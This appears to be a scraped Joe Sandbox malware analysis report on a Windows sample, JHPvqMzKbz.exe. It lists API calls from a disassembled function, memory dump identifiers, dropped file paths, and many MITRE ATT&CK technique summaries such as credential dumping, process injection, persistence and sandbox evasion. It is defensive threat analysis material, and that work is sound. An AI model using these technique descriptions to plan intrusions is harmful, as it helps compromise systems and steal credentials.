Instruction ID: 305bda58d8e24026e7a4c0001ba7ad003422563db6547c4f86a53662b759354c
Opcode Fuzzy Hash: 25d57794aff5f0d0e29c4aeb4992bf6d5fcc03ab045aeadcb8b93ce084485231
Instruction Fuzzy Hash: 21D0A931390320AAE234B7B09C4BF963A50BB10B00F000824B356AA1D1CDF0A8018784

Function 00AC4893 Relevance: 5.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AC4928
GetLastError.KERNEL32 ref: 00AC4936
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AC4989
MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AC49C4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 48e538f8d0c05ab089a5fa3337ce778c917c395605cfdfd812ef9ac6f4d2109a
Instruction ID: d0c89fcbf6963f9f90c6cdfac48bd9bfad72caabe731f90b7de7f648a8e348f1
Opcode Fuzzy Hash: 48e538f8d0c05ab089a5fa3337ce778c917c395605cfdfd812ef9ac6f4d2109a
Instruction Fuzzy Hash: 5F41C831604666AFDF319F28CD55FAB7BA8EF09310F22055EF459AB1A1DB308D10C7A5

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report JHPvqMzKbz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AKFCBFHJDHJK\BGDAKE

C:\ProgramData\AKFCBFHJDHJK\DBKEHD

C:\ProgramData\AKFCBFHJDHJK\DBKKFC

C:\ProgramData\AKFCBFHJDHJK\FBGIDH

C:\ProgramData\AKFCBFHJDHJK\FBGIDH-shm

C:\ProgramData\AKFCBFHJDHJK\GCFIIE

C:\ProgramData\AKFCBFHJDHJK\GIJEBK

C:\ProgramData\AKFCBFHJDHJK\JKEGDH

Windows Analysis Report
JHPvqMzKbz.exe

Description:	Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.
Tactics:	Discovery
Data Sources:	Cloud Service: Cloud Service Enumeration, Command: Command Execution, Network Traffic: Network Traffic Flow
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre